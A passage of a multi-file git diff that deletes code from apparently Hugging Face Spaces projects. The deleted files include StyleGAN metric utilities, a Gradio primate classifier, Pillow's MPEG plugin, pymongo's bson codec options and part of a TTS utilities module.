-# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. - -"""Miscellaneous utilities used internally by the quality metrics.""" - -import os -import time -import hashlib -import pickle -import copy -import uuid -import numpy as np -import torch -import dnnlib - -#---------------------------------------------------------------------------- - -class MetricOptions: - def __init__(self, G=None, G_kwargs={}, dataset_kwargs={}, num_gpus=1, rank=0, device=None, progress=None, cache=True): - assert 0 <= rank < num_gpus - self.G = G - self.G_kwargs = dnnlib.EasyDict(G_kwargs) - self.dataset_kwargs = dnnlib.EasyDict(dataset_kwargs) - self.num_gpus = num_gpus - self.rank = rank - self.device = device if device is not None else torch.device('cuda', rank) - self.progress = progress.sub() if progress is not None and rank == 0 else ProgressMonitor() - self.cache = cache - -#---------------------------------------------------------------------------- - -_feature_detector_cache = dict() - -def get_feature_detector_name(url): - return os.path.splitext(url.split('/')[-1])[0] - -def get_feature_detector(url, device=torch.device('cpu'), num_gpus=1, rank=0, verbose=False): - assert 0 <= rank < num_gpus - key = (url, device) - if key not in _feature_detector_cache: - is_leader = (rank == 0) - if not is_leader and num_gpus > 1: - torch.distributed.barrier() # leader goes first - with dnnlib.util.open_url(url, verbose=(verbose and is_leader)) as f: - _feature_detector_cache[key] = pickle.load(f).to(device) - if is_leader and num_gpus > 1: - torch.distributed.barrier() # others follow - return _feature_detector_cache[key] - -#---------------------------------------------------------------------------- - -def iterate_random_labels(opts, batch_size): - if opts.G.c_dim == 0: - c = torch.zeros([batch_size, opts.G.c_dim], device=opts.device) - while True: - yield c - else: - dataset = dnnlib.util.construct_class_by_name(**opts.dataset_kwargs) - while True: - c = [dataset.get_label(np.random.randint(len(dataset))) for _i in range(batch_size)] - c = torch.from_numpy(np.stack(c)).pin_memory().to(opts.device) - yield c - -#---------------------------------------------------------------------------- - -class FeatureStats: - def __init__(self, capture_all=False, capture_mean_cov=False, max_items=None): - self.capture_all = capture_all - self.capture_mean_cov = capture_mean_cov - self.max_items = max_items - self.num_items = 0 - self.num_features = None - self.all_features = None - self.raw_mean = None - self.raw_cov = None - - def set_num_features(self, num_features): - if self.num_features is not None: - assert num_features == self.num_features - else: - self.num_features = num_features - self.all_features = [] - self.raw_mean = np.zeros([num_features], dtype=np.float64) - self.raw_cov = np.zeros([num_features, num_features], dtype=np.float64) - - def is_full(self): - return (self.max_items is not None) and (self.num_items >= self.max_items) - - def append(self, x): - x = np.asarray(x, dtype=np.float32) - assert x.ndim == 2 - if (self.max_items is not None) and (self.num_items + x.shape[0] > self.max_items): - if self.num_items >= self.max_items: - return - x = x[:self.max_items - self.num_items] - - 
self.set_num_features(x.shape[1]) - self.num_items += x.shape[0] - if self.capture_all: - self.all_features.append(x) - if self.capture_mean_cov: - x64 = x.astype(np.float64) - self.raw_mean += x64.sum(axis=0) - self.raw_cov += x64.T @ x64 - - def append_torch(self, x, num_gpus=1, rank=0): - assert isinstance(x, torch.Tensor) and x.ndim == 2 - assert 0 <= rank < num_gpus - if num_gpus > 1: - ys = [] - for src in range(num_gpus): - y = x.clone() - torch.distributed.broadcast(y, src=src) - ys.append(y) - x = torch.stack(ys, dim=1).flatten(0, 1) # interleave samples - self.append(x.cpu().numpy()) - - def get_all(self): - assert self.capture_all - return np.concatenate(self.all_features, axis=0) - - def get_all_torch(self): - return torch.from_numpy(self.get_all()) - - def get_mean_cov(self): - assert self.capture_mean_cov - mean = self.raw_mean / self.num_items - cov = self.raw_cov / self.num_items - cov = cov - np.outer(mean, mean) - return mean, cov - - def save(self, pkl_file): - with open(pkl_file, 'wb') as f: - pickle.dump(self.__dict__, f) - - @staticmethod - def load(pkl_file): - with open(pkl_file, 'rb') as f: - s = dnnlib.EasyDict(pickle.load(f)) - obj = FeatureStats(capture_all=s.capture_all, max_items=s.max_items) - obj.__dict__.update(s) - return obj - -#---------------------------------------------------------------------------- - -class ProgressMonitor: - def __init__(self, tag=None, num_items=None, flush_interval=1000, verbose=False, progress_fn=None, pfn_lo=0, pfn_hi=1000, pfn_total=1000): - self.tag = tag - self.num_items = num_items - self.verbose = verbose - self.flush_interval = flush_interval - self.progress_fn = progress_fn - self.pfn_lo = pfn_lo - self.pfn_hi = pfn_hi - self.pfn_total = pfn_total - self.start_time = time.time() - self.batch_time = self.start_time - self.batch_items = 0 - if self.progress_fn is not None: - self.progress_fn(self.pfn_lo, self.pfn_total) - - def update(self, cur_items): - assert (self.num_items is None) or (cur_items <= self.num_items) - if (cur_items < self.batch_items + self.flush_interval) and (self.num_items is None or cur_items < self.num_items): - return - cur_time = time.time() - total_time = cur_time - self.start_time - time_per_item = (cur_time - self.batch_time) / max(cur_items - self.batch_items, 1) - if (self.verbose) and (self.tag is not None): - print(f'{self.tag:<19s} items {cur_items:<7d} time {dnnlib.util.format_time(total_time):<12s} ms/item {time_per_item*1e3:.2f}') - self.batch_time = cur_time - self.batch_items = cur_items - - if (self.progress_fn is not None) and (self.num_items is not None): - self.progress_fn(self.pfn_lo + (self.pfn_hi - self.pfn_lo) * (cur_items / self.num_items), self.pfn_total) - - def sub(self, tag=None, num_items=None, flush_interval=1000, rel_lo=0, rel_hi=1): - return ProgressMonitor( - tag = tag, - num_items = num_items, - flush_interval = flush_interval, - verbose = self.verbose, - progress_fn = self.progress_fn, - pfn_lo = self.pfn_lo + (self.pfn_hi - self.pfn_lo) * rel_lo, - pfn_hi = self.pfn_lo + (self.pfn_hi - self.pfn_lo) * rel_hi, - pfn_total = self.pfn_total, - ) - -#---------------------------------------------------------------------------- - -def compute_feature_stats_for_dataset(opts, detector_url, detector_kwargs, rel_lo=0, rel_hi=1, batch_size=64, data_loader_kwargs=None, max_items=None, **stats_kwargs): - dataset = dnnlib.util.construct_class_by_name(**opts.dataset_kwargs) - if data_loader_kwargs is None: - data_loader_kwargs = dict(pin_memory=True, num_workers=3, 
prefetch_factor=2) - - # Try to lookup from cache. - cache_file = None - if opts.cache: - # Choose cache file name. - args = dict(dataset_kwargs=opts.dataset_kwargs, detector_url=detector_url, detector_kwargs=detector_kwargs, stats_kwargs=stats_kwargs) - md5 = hashlib.md5(repr(sorted(args.items())).encode('utf-8')) - cache_tag = f'{dataset.name}-{get_feature_detector_name(detector_url)}-{md5.hexdigest()}' - cache_file = dnnlib.make_cache_dir_path('gan-metrics', cache_tag + '.pkl') - - # Check if the file exists (all processes must agree). - flag = os.path.isfile(cache_file) if opts.rank == 0 else False - if opts.num_gpus > 1: - flag = torch.as_tensor(flag, dtype=torch.float32, device=opts.device) - torch.distributed.broadcast(tensor=flag, src=0) - flag = (float(flag.cpu()) != 0) - - # Load. - if flag: - return FeatureStats.load(cache_file) - - # Initialize. - num_items = len(dataset) - if max_items is not None: - num_items = min(num_items, max_items) - stats = FeatureStats(max_items=num_items, **stats_kwargs) - progress = opts.progress.sub(tag='dataset features', num_items=num_items, rel_lo=rel_lo, rel_hi=rel_hi) - detector = get_feature_detector(url=detector_url, device=opts.device, num_gpus=opts.num_gpus, rank=opts.rank, verbose=progress.verbose) - - # Main loop. - item_subset = [(i * opts.num_gpus + opts.rank) % num_items for i in range((num_items - 1) // opts.num_gpus + 1)] - for images, _labels in torch.utils.data.DataLoader(dataset=dataset, sampler=item_subset, batch_size=batch_size, **data_loader_kwargs): - if images.shape[1] == 1: - images = images.repeat([1, 3, 1, 1]) - features = detector(images.to(opts.device), **detector_kwargs) - stats.append_torch(features, num_gpus=opts.num_gpus, rank=opts.rank) - progress.update(stats.num_items) - - # Save to cache. - if cache_file is not None and opts.rank == 0: - os.makedirs(os.path.dirname(cache_file), exist_ok=True) - temp_file = cache_file + '.' + uuid.uuid4().hex - stats.save(temp_file) - os.replace(temp_file, cache_file) # atomic - return stats - -#---------------------------------------------------------------------------- - -def compute_feature_stats_for_generator(opts, detector_url, detector_kwargs, rel_lo=0, rel_hi=1, batch_size=64, batch_gen=None, **stats_kwargs): - if batch_gen is None: - batch_gen = min(batch_size, 4) - assert batch_size % batch_gen == 0 - - # Setup generator and labels. - G = copy.deepcopy(opts.G).eval().requires_grad_(False).to(opts.device) - c_iter = iterate_random_labels(opts=opts, batch_size=batch_gen) - - # Initialize. - stats = FeatureStats(**stats_kwargs) - assert stats.max_items is not None - progress = opts.progress.sub(tag='generator features', num_items=stats.max_items, rel_lo=rel_lo, rel_hi=rel_hi) - detector = get_feature_detector(url=detector_url, device=opts.device, num_gpus=opts.num_gpus, rank=opts.rank, verbose=progress.verbose) - - # Main loop. 
- while not stats.is_full(): - images = [] - for _i in range(batch_size // batch_gen): - z = torch.randn([batch_gen, G.z_dim], device=opts.device) - img = G(z=z, c=next(c_iter), **opts.G_kwargs) - img = (img * 127.5 + 128).clamp(0, 255).to(torch.uint8) - images.append(img) - images = torch.cat(images) - if images.shape[1] == 1: - images = images.repeat([1, 3, 1, 1]) - features = detector(images, **detector_kwargs) - stats.append_torch(features, num_gpus=opts.num_gpus, rank=opts.rank) - progress.update(stats.num_items) - return stats - -#---------------------------------------------------------------------------- diff --git a/spaces/jasonreisman/primates/app.py b/spaces/jasonreisman/primates/app.py deleted file mode 100644 index 30cc6fe359dbf0f6052f8e830ed11ffeae891b52..0000000000000000000000000000000000000000 --- a/spaces/jasonreisman/primates/app.py +++ /dev/null @@ -1,20 +0,0 @@ -import gradio as gr -from fastai.vision.all import * -import skimage - -learn = load_learner('chimpanzee-gorilla-human-mandrill-orangutan.pkl') - -labels = learn.dls.vocab -def predict(img): - img = PILImage.create(img) - pred, pred_idx, probs = learn.predict(img) - return {labels[i]: float(probs[i]) for i in range(len(labels))} - -title = "Primate Palooza" -description = "Classify chimps, gorillas, humans, mandrills, and orangutan" -examples = ['chimpanzee.jpg', 'gorilla.jpg', 'human.jpg', 'mandrill.jpg', 'orangutan.jpg'] -interpretation='default' -enable_queue=True - -grint = gr.Interface(fn=predict, inputs=gr.Image(shape=(512, 512)), outputs=gr.Label(num_top_classes=5), title=title, description=description, examples=examples, interpretation=interpretation, enable_queue=enable_queue) -grint.launch() diff --git a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/PIL/MpegImagePlugin.py b/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/PIL/MpegImagePlugin.py deleted file mode 100644 index d96d3a11c4966e94a53c67f13c3bf8f7987c0c83..0000000000000000000000000000000000000000 --- a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/PIL/MpegImagePlugin.py +++ /dev/null @@ -1,82 +0,0 @@ -# -# The Python Imaging Library. -# $Id$ -# -# MPEG file handling -# -# History: -# 95-09-09 fl Created -# -# Copyright (c) Secret Labs AB 1997. -# Copyright (c) Fredrik Lundh 1995. -# -# See the README file for information on usage and redistribution. -# - - -from . import Image, ImageFile -from ._binary import i8 - -# -# Bitstream parser - - -class BitStream: - def __init__(self, fp): - self.fp = fp - self.bits = 0 - self.bitbuffer = 0 - - def next(self): - return i8(self.fp.read(1)) - - def peek(self, bits): - while self.bits < bits: - c = self.next() - if c < 0: - self.bits = 0 - continue - self.bitbuffer = (self.bitbuffer << 8) + c - self.bits += 8 - return self.bitbuffer >> (self.bits - bits) & (1 << bits) - 1 - - def skip(self, bits): - while self.bits < bits: - self.bitbuffer = (self.bitbuffer << 8) + i8(self.fp.read(1)) - self.bits += 8 - self.bits = self.bits - bits - - def read(self, bits): - v = self.peek(bits) - self.bits = self.bits - bits - return v - - -## -# Image plugin for MPEG streams. This plugin can identify a stream, -# but it cannot read it. 
- - -class MpegImageFile(ImageFile.ImageFile): - format = "MPEG" - format_description = "MPEG" - - def _open(self): - s = BitStream(self.fp) - - if s.read(32) != 0x1B3: - msg = "not an MPEG file" - raise SyntaxError(msg) - - self.mode = "RGB" - self._size = s.read(12), s.read(12) - - -# -------------------------------------------------------------------- -# Registry stuff - -Image.register_open(MpegImageFile.format, MpegImageFile) - -Image.register_extensions(MpegImageFile.format, [".mpg", ".mpeg"]) - -Image.register_mime(MpegImageFile.format, "video/mpeg") diff --git a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/bson/codec_options.py b/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/bson/codec_options.py deleted file mode 100644 index 9c511b5d6fcd80941ff18c207ec5e400e48febd9..0000000000000000000000000000000000000000 --- a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/bson/codec_options.py +++ /dev/null @@ -1,507 +0,0 @@ -# Copyright 2014-present MongoDB, Inc. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -"""Tools for specifying BSON codec options.""" - -import abc -import datetime -import enum -from collections.abc import MutableMapping as _MutableMapping -from typing import ( - TYPE_CHECKING, - Any, - Callable, - Dict, - Generic, - Iterable, - Mapping, - NamedTuple, - Optional, - Tuple, - Type, - Union, - cast, -) - -from bson.binary import ( - ALL_UUID_REPRESENTATIONS, - UUID_REPRESENTATION_NAMES, - UuidRepresentation, -) -from bson.typings import _DocumentType - -_RAW_BSON_DOCUMENT_MARKER = 101 - - -def _raw_document_class(document_class: Any) -> bool: - """Determine if a document_class is a RawBSONDocument class.""" - marker = getattr(document_class, "_type_marker", None) - return marker == _RAW_BSON_DOCUMENT_MARKER - - -class TypeEncoder(abc.ABC): - """Base class for defining type codec classes which describe how a - custom type can be transformed to one of the types BSON understands. - - Codec classes must implement the ``python_type`` attribute, and the - ``transform_python`` method to support encoding. - - See :ref:`custom-type-type-codec` documentation for an example. - """ - - @abc.abstractproperty - def python_type(self) -> Any: - """The Python type to be converted into something serializable.""" - - @abc.abstractmethod - def transform_python(self, value: Any) -> Any: - """Convert the given Python object into something serializable.""" - - -class TypeDecoder(abc.ABC): - """Base class for defining type codec classes which describe how a - BSON type can be transformed to a custom type. - - Codec classes must implement the ``bson_type`` attribute, and the - ``transform_bson`` method to support decoding. - - See :ref:`custom-type-type-codec` documentation for an example. 
- """ - - @abc.abstractproperty - def bson_type(self) -> Any: - """The BSON type to be converted into our own type.""" - - @abc.abstractmethod - def transform_bson(self, value: Any) -> Any: - """Convert the given BSON value into our own type.""" - - -class TypeCodec(TypeEncoder, TypeDecoder): - """Base class for defining type codec classes which describe how a - custom type can be transformed to/from one of the types :mod:`bson` - can already encode/decode. - - Codec classes must implement the ``python_type`` attribute, and the - ``transform_python`` method to support encoding, as well as the - ``bson_type`` attribute, and the ``transform_bson`` method to support - decoding. - - See :ref:`custom-type-type-codec` documentation for an example. - """ - - -_Codec = Union[TypeEncoder, TypeDecoder, TypeCodec] -_Fallback = Callable[[Any], Any] - - -class TypeRegistry: - """Encapsulates type codecs used in encoding and / or decoding BSON, as - well as the fallback encoder. Type registries cannot be modified after - instantiation. - - ``TypeRegistry`` can be initialized with an iterable of type codecs, and - a callable for the fallback encoder:: - - >>> from bson.codec_options import TypeRegistry - >>> type_registry = TypeRegistry([Codec1, Codec2, Codec3, ...], - ... fallback_encoder) - - See :ref:`custom-type-type-registry` documentation for an example. - - :Parameters: - - `type_codecs` (optional): iterable of type codec instances. If - ``type_codecs`` contains multiple codecs that transform a single - python or BSON type, the transformation specified by the type codec - occurring last prevails. A TypeError will be raised if one or more - type codecs modify the encoding behavior of a built-in :mod:`bson` - type. - - `fallback_encoder` (optional): callable that accepts a single, - unencodable python value and transforms it into a type that - :mod:`bson` can encode. See :ref:`fallback-encoder-callable` - documentation for an example. 
- """ - - def __init__( - self, - type_codecs: Optional[Iterable[_Codec]] = None, - fallback_encoder: Optional[_Fallback] = None, - ) -> None: - self.__type_codecs = list(type_codecs or []) - self._fallback_encoder = fallback_encoder - self._encoder_map: Dict[Any, Any] = {} - self._decoder_map: Dict[Any, Any] = {} - - if self._fallback_encoder is not None: - if not callable(fallback_encoder): - raise TypeError("fallback_encoder %r is not a callable" % (fallback_encoder)) - - for codec in self.__type_codecs: - is_valid_codec = False - if isinstance(codec, TypeEncoder): - self._validate_type_encoder(codec) - is_valid_codec = True - self._encoder_map[codec.python_type] = codec.transform_python - if isinstance(codec, TypeDecoder): - is_valid_codec = True - self._decoder_map[codec.bson_type] = codec.transform_bson - if not is_valid_codec: - raise TypeError( - f"Expected an instance of {TypeEncoder.__name__}, {TypeDecoder.__name__}, or {TypeCodec.__name__}, got {codec!r} instead" - ) - - def _validate_type_encoder(self, codec: _Codec) -> None: - from bson import _BUILT_IN_TYPES - - for pytype in _BUILT_IN_TYPES: - if issubclass(cast(TypeCodec, codec).python_type, pytype): - err_msg = ( - "TypeEncoders cannot change how built-in types are " - "encoded (encoder {} transforms type {})".format(codec, pytype) - ) - raise TypeError(err_msg) - - def __repr__(self) -> str: - return "{}(type_codecs={!r}, fallback_encoder={!r})".format( - self.__class__.__name__, - self.__type_codecs, - self._fallback_encoder, - ) - - def __eq__(self, other: Any) -> Any: - if not isinstance(other, type(self)): - return NotImplemented - return ( - (self._decoder_map == other._decoder_map) - and (self._encoder_map == other._encoder_map) - and (self._fallback_encoder == other._fallback_encoder) - ) - - -class DatetimeConversion(int, enum.Enum): - """Options for decoding BSON datetimes.""" - - DATETIME = 1 - """Decode a BSON UTC datetime as a :class:`datetime.datetime`. - - BSON UTC datetimes that cannot be represented as a - :class:`~datetime.datetime` will raise an :class:`OverflowError` - or a :class:`ValueError`. - - .. versionadded 4.3 - """ - - DATETIME_CLAMP = 2 - """Decode a BSON UTC datetime as a :class:`datetime.datetime`, clamping - to :attr:`~datetime.datetime.min` and :attr:`~datetime.datetime.max`. - - .. versionadded 4.3 - """ - - DATETIME_MS = 3 - """Decode a BSON UTC datetime as a :class:`~bson.datetime_ms.DatetimeMS` - object. - - .. versionadded 4.3 - """ - - DATETIME_AUTO = 4 - """Decode a BSON UTC datetime as a :class:`datetime.datetime` if possible, - and a :class:`~bson.datetime_ms.DatetimeMS` if not. - - .. 
versionadded 4.3 - """ - - -class _BaseCodecOptions(NamedTuple): - document_class: Type[Mapping[str, Any]] - tz_aware: bool - uuid_representation: int - unicode_decode_error_handler: str - tzinfo: Optional[datetime.tzinfo] - type_registry: TypeRegistry - datetime_conversion: Optional[DatetimeConversion] - - -if TYPE_CHECKING: - - class CodecOptions(Tuple, Generic[_DocumentType]): - document_class: Type[_DocumentType] - tz_aware: bool - uuid_representation: int - unicode_decode_error_handler: Optional[str] - tzinfo: Optional[datetime.tzinfo] - type_registry: TypeRegistry - datetime_conversion: Optional[int] - - def __new__( - cls: Type["CodecOptions"], - document_class: Optional[Type[_DocumentType]] = ..., - tz_aware: bool = ..., - uuid_representation: Optional[int] = ..., - unicode_decode_error_handler: Optional[str] = ..., - tzinfo: Optional[datetime.tzinfo] = ..., - type_registry: Optional[TypeRegistry] = ..., - datetime_conversion: Optional[int] = ..., - ) -> "CodecOptions[_DocumentType]": - ... - - # CodecOptions API - def with_options(self, **kwargs: Any) -> "CodecOptions[_DocumentType]": - ... - - def _arguments_repr(self) -> str: - ... - - def _options_dict(self) -> Dict[Any, Any]: - ... - - # NamedTuple API - @classmethod - def _make(cls, obj: Iterable) -> "CodecOptions[_DocumentType]": - ... - - def _asdict(self) -> Dict[str, Any]: - ... - - def _replace(self, **kwargs: Any) -> "CodecOptions[_DocumentType]": - ... - - _source: str - _fields: Tuple[str] - -else: - - class CodecOptions(_BaseCodecOptions): - """Encapsulates options used encoding and / or decoding BSON.""" - - def __init__(self, *args, **kwargs): - """Encapsulates options used encoding and / or decoding BSON. - - The `document_class` option is used to define a custom type for use - decoding BSON documents. Access to the underlying raw BSON bytes for - a document is available using the :class:`~bson.raw_bson.RawBSONDocument` - type:: - - >>> from bson.raw_bson import RawBSONDocument - >>> from bson.codec_options import CodecOptions - >>> codec_options = CodecOptions(document_class=RawBSONDocument) - >>> coll = db.get_collection('test', codec_options=codec_options) - >>> doc = coll.find_one() - >>> doc.raw - '\\x16\\x00\\x00\\x00\\x07_id\\x00[0\\x165\\x91\\x10\\xea\\x14\\xe8\\xc5\\x8b\\x93\\x00' - - The document class can be any type that inherits from - :class:`~collections.abc.MutableMapping`:: - - >>> class AttributeDict(dict): - ... # A dict that supports attribute access. - ... def __getattr__(self, key): - ... return self[key] - ... def __setattr__(self, key, value): - ... self[key] = value - ... - >>> codec_options = CodecOptions(document_class=AttributeDict) - >>> coll = db.get_collection('test', codec_options=codec_options) - >>> doc = coll.find_one() - >>> doc._id - ObjectId('5b3016359110ea14e8c58b93') - - See :doc:`/examples/datetimes` for examples using the `tz_aware` and - `tzinfo` options. - - See :doc:`/examples/uuid` for examples using the `uuid_representation` - option. - - :Parameters: - - `document_class`: BSON documents returned in queries will be decoded - to an instance of this class. Must be a subclass of - :class:`~collections.abc.MutableMapping`. Defaults to :class:`dict`. - - `tz_aware`: If ``True``, BSON datetimes will be decoded to timezone - aware instances of :class:`~datetime.datetime`. Otherwise they will be - naive. Defaults to ``False``. - - `uuid_representation`: The BSON representation to use when encoding - and decoding instances of :class:`~uuid.UUID`. 
Defaults to - :data:`~bson.binary.UuidRepresentation.UNSPECIFIED`. New - applications should consider setting this to - :data:`~bson.binary.UuidRepresentation.STANDARD` for cross language - compatibility. See :ref:`handling-uuid-data-example` for details. - - `unicode_decode_error_handler`: The error handler to apply when - a Unicode-related error occurs during BSON decoding that would - otherwise raise :exc:`UnicodeDecodeError`. Valid options include - 'strict', 'replace', 'backslashreplace', 'surrogateescape', and - 'ignore'. Defaults to 'strict'. - - `tzinfo`: A :class:`~datetime.tzinfo` subclass that specifies the - timezone to/from which :class:`~datetime.datetime` objects should be - encoded/decoded. - - `type_registry`: Instance of :class:`TypeRegistry` used to customize - encoding and decoding behavior. - - `datetime_conversion`: Specifies how UTC datetimes should be decoded - within BSON. Valid options include 'datetime_ms' to return as a - DatetimeMS, 'datetime' to return as a datetime.datetime and - raising a ValueError for out-of-range values, 'datetime_auto' to - return DatetimeMS objects when the underlying datetime is - out-of-range and 'datetime_clamp' to clamp to the minimum and - maximum possible datetimes. Defaults to 'datetime'. - - .. versionchanged:: 4.0 - The default for `uuid_representation` was changed from - :const:`~bson.binary.UuidRepresentation.PYTHON_LEGACY` to - :const:`~bson.binary.UuidRepresentation.UNSPECIFIED`. - - .. versionadded:: 3.8 - `type_registry` attribute. - - .. warning:: Care must be taken when changing - `unicode_decode_error_handler` from its default value ('strict'). - The 'replace' and 'ignore' modes should not be used when documents - retrieved from the server will be modified in the client application - and stored back to the server. - """ - super().__init__() - - def __new__( - cls: Type["CodecOptions"], - document_class: Optional[Type[Mapping[str, Any]]] = None, - tz_aware: bool = False, - uuid_representation: Optional[int] = UuidRepresentation.UNSPECIFIED, - unicode_decode_error_handler: str = "strict", - tzinfo: Optional[datetime.tzinfo] = None, - type_registry: Optional[TypeRegistry] = None, - datetime_conversion: Optional[DatetimeConversion] = DatetimeConversion.DATETIME, - ) -> "CodecOptions": - doc_class = document_class or dict - # issubclass can raise TypeError for generic aliases like SON[str, Any]. - # In that case we can use the base class for the comparison. 
- is_mapping = False - try: - is_mapping = issubclass(doc_class, _MutableMapping) - except TypeError: - if hasattr(doc_class, "__origin__"): - is_mapping = issubclass(doc_class.__origin__, _MutableMapping) - if not (is_mapping or _raw_document_class(doc_class)): - raise TypeError( - "document_class must be dict, bson.son.SON, " - "bson.raw_bson.RawBSONDocument, or a " - "subclass of collections.abc.MutableMapping" - ) - if not isinstance(tz_aware, bool): - raise TypeError(f"tz_aware must be True or False, was: tz_aware={tz_aware}") - if uuid_representation not in ALL_UUID_REPRESENTATIONS: - raise ValueError( - "uuid_representation must be a value from bson.binary.UuidRepresentation" - ) - if not isinstance(unicode_decode_error_handler, str): - raise ValueError("unicode_decode_error_handler must be a string") - if tzinfo is not None: - if not isinstance(tzinfo, datetime.tzinfo): - raise TypeError("tzinfo must be an instance of datetime.tzinfo") - if not tz_aware: - raise ValueError("cannot specify tzinfo without also setting tz_aware=True") - - type_registry = type_registry or TypeRegistry() - - if not isinstance(type_registry, TypeRegistry): - raise TypeError("type_registry must be an instance of TypeRegistry") - - return tuple.__new__( - cls, - ( - doc_class, - tz_aware, - uuid_representation, - unicode_decode_error_handler, - tzinfo, - type_registry, - datetime_conversion, - ), - ) - - def _arguments_repr(self) -> str: - """Representation of the arguments used to create this object.""" - document_class_repr = ( - "dict" if self.document_class is dict else repr(self.document_class) - ) - - uuid_rep_repr = UUID_REPRESENTATION_NAMES.get( - self.uuid_representation, self.uuid_representation - ) - - return ( - "document_class={}, tz_aware={!r}, uuid_representation={}, " - "unicode_decode_error_handler={!r}, tzinfo={!r}, " - "type_registry={!r}, datetime_conversion={!s}".format( - document_class_repr, - self.tz_aware, - uuid_rep_repr, - self.unicode_decode_error_handler, - self.tzinfo, - self.type_registry, - self.datetime_conversion, - ) - ) - - def _options_dict(self) -> Dict[str, Any]: - """Dictionary of the arguments used to create this object.""" - # TODO: PYTHON-2442 use _asdict() instead - return { - "document_class": self.document_class, - "tz_aware": self.tz_aware, - "uuid_representation": self.uuid_representation, - "unicode_decode_error_handler": self.unicode_decode_error_handler, - "tzinfo": self.tzinfo, - "type_registry": self.type_registry, - "datetime_conversion": self.datetime_conversion, - } - - def __repr__(self) -> str: - return f"{self.__class__.__name__}({self._arguments_repr()})" - - def with_options(self, **kwargs: Any) -> "CodecOptions": - """Make a copy of this CodecOptions, overriding some options:: - - >>> from bson.codec_options import DEFAULT_CODEC_OPTIONS - >>> DEFAULT_CODEC_OPTIONS.tz_aware - False - >>> options = DEFAULT_CODEC_OPTIONS.with_options(tz_aware=True) - >>> options.tz_aware - True - - .. 
versionadded:: 3.5 - """ - opts = self._options_dict() - opts.update(kwargs) - return CodecOptions(**opts) - - -DEFAULT_CODEC_OPTIONS: "CodecOptions[Dict[str, Any]]" = CodecOptions() - - -def _parse_codec_options(options: Any) -> CodecOptions: - """Parse BSON codec options.""" - kwargs = {} - for k in set(options) & { - "document_class", - "tz_aware", - "uuidrepresentation", - "unicode_decode_error_handler", - "tzinfo", - "type_registry", - "datetime_conversion", - }: - if k == "uuidrepresentation": - kwargs["uuid_representation"] = options[k] - else: - kwargs[k] = options[k] - return CodecOptions(**kwargs) diff --git a/spaces/joushe/moe-tts/utils.py b/spaces/joushe/moe-tts/utils.py deleted file mode 100644 index 4cb5b43d0ca2bae496e7871b2094f2ffb26ab642..0000000000000000000000000000000000000000 --- a/spaces/joushe/moe-tts/utils.py +++ /dev/null @@ -1,226 +0,0 @@ -import os -import glob -import sys -import argparse -import logging -import json -import subprocess -import numpy as np -from scipy.io.wavfile import read -import torch - -MATPLOTLIB_FLAG = False - -logging.basicConfig(stream=sys.stdout, level=logging.ERROR) -logger = logging - - -def load_checkpoint(checkpoint_path, model, optimizer=None): - assert os.path.isfile(checkpoint_path) - checkpoint_dict = torch.load(checkpoint_path, map_location='cpu') - iteration = checkpoint_dict['iteration'] - learning_rate = checkpoint_dict['learning_rate'] - if optimizer is not None: - optimizer.load_state_dict(checkpoint_dict['optimizer']) - saved_state_dict = checkpoint_dict['model'] - if hasattr(model, 'module'): - state_dict = model.module.state_dict() - else: - state_dict = model.state_dict() - new_state_dict = {} - for k, v in state_dict.items(): - try: - new_state_dict[k] = saved_state_dict[k] - except: - logger.info("%s is not in the checkpoint" % k) - new_state_dict[k] = v - if hasattr(model, 'module'): - model.module.load_state_dict(new_state_dict) - else: - model.load_state_dict(new_state_dict) - logger.info("Loaded checkpoint '{}' (iteration {})".format( - checkpoint_path, iteration)) - return model, optimizer, learning_rate, iteration - - -def plot_spectrogram_to_numpy(spectrogram): - global MATPLOTLIB_FLAG - if not MATPLOTLIB_FLAG: - import matplotlib - matplotlib.use("Agg") - MATPLOTLIB_FLAG = True - mpl_logger = logging.getLogger('matplotlib') - mpl_logger.setLevel(logging.WARNING) - import matplotlib.pylab as plt - import numpy as np - - fig, ax = plt.subplots(figsize=(10, 2)) - im = ax.imshow(spectrogram, aspect="auto", origin="lower", - interpolation='none') - plt.colorbar(im, ax=ax) - plt.xlabel("Frames") - plt.ylabel("Channels") - plt.tight_layout() - - fig.canvas.draw() - data = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='') - data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,)) - plt.close() - return data - - -def plot_alignment_to_numpy(alignment, info=None): - global MATPLOTLIB_FLAG - if not MATPLOTLIB_FLAG: - import matplotlib - matplotlib.use("Agg") - MATPLOTLIB_FLAG = True - mpl_logger = logging.getLogger('matplotlib') - mpl_logger.setLevel(logging.WARNING) - import matplotlib.pylab as plt - import numpy as np - - fig, ax = plt.subplots(figsize=(6, 4)) - im = ax.imshow(alignment.transpose(), aspect='auto', origin='lower', - interpolation='none') - fig.colorbar(im, ax=ax) - xlabel = 'Decoder timestep' - if info is not None: - xlabel += '\n\n' + info - plt.xlabel(xlabel) - plt.ylabel('Encoder timestep') - plt.tight_layout() - - fig.canvas.draw() - data = 
